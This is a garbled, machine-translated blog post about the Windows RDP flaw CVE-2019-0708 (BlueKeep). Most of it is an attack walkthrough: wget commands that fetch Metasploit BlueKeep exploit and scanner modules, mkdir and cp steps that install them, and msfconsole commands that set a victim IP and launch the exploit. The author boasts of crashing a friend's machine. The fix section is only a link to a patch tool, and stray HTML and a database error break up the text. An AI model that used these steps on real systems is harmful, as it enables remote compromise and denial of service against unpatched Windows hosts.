CVE 2019-0708 Vulnerability Refold Refreshment Repair

By Windows

CVE-2019-0708

Windows was once again exposed to a high-risk remote vulnerability CVE-2019-0708 with great destructive power. Once the attacker successfully exploits the vulnerability, he can execute arbitrary code on the target system, including obtaining sensitive information, executing remote code, launching a denial of service attack, and other attacks. What’s more serious is that this vulnerability is triggered without user interaction, and attackers can use the vulnerability to create a WannaCry-like worm comparable to the WannaCry-like worm that swept the world in 2017, so as to spread and destroy it on a large scale.

Just today Microsoft officially released exp

Scope of influence

  • Windows 7
  • Windows Server 2008 R2
  • Windows Server 2008
  • Windows 2003< /li>
  • Windows XP

First update our kaili

apt-get install metasploit-framework

After the update is complete

Open msfconsole, there is no use program but only detection tools

Share picture

Download exp

< p>Netdisk: Link: https://pan.baidu.com/s/11He0JOhvKfWPaXCcclmKtQ Extraction code: vh8h

wget download
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/ edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb



wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb



wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb



wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Put the downloaded files in sequence

Execute the command to create the exploit folder

mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/

mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

mkdir -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb



cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb



cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Reopen msfconsole

Reload

reload_all

Share picture

We import

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

share picture

This exp currently only has windwos 7 /2008r2 and it is a community castrated version that is easy to blue screen

set RHOSTS set IP
set RPORT set RDP Port number
Use set target ID to set the victim machine
Use the exploit to start the attack and wait for the connection to be established

Share pictures

Of course you can also choose other

show targets

Run directly

p>

share picture

It has been reproduced once before. As soon as the reproduce is executed, it will blue screen and put a friend successfully

Share picture

And mine

Share a picture

VulnerabilityFix strong>

http://weishi.360.cn/mianyigongju.html

Go to this address to fix the bug

share picture

< /span>

share picture

apt-get install metasploit-framework

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb



wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb



wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb



wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

mkdir -p /usr/share/metasploit-framework/modules windows/rdp/

mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

mkdir -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb



cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb



cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

, , , ,

WordPress database error: [Table 'yf99682.wp_s6mz6tyggq_comments' doesn't exist]
SELECT SQL_CALC_FOUND_ROWS wp_s6mz6tyggq_comments.comment_ID FROM wp_s6mz6tyggq_comments WHERE ( comment_approved = '1' ) AND comment_post_ID = 549 ORDER BY wp_s6mz6tyggq_comments.comment_date_gmt ASC, wp_s6mz6tyggq_comments.comment_ID ASC

Leave a Comment

Your email address will not be published.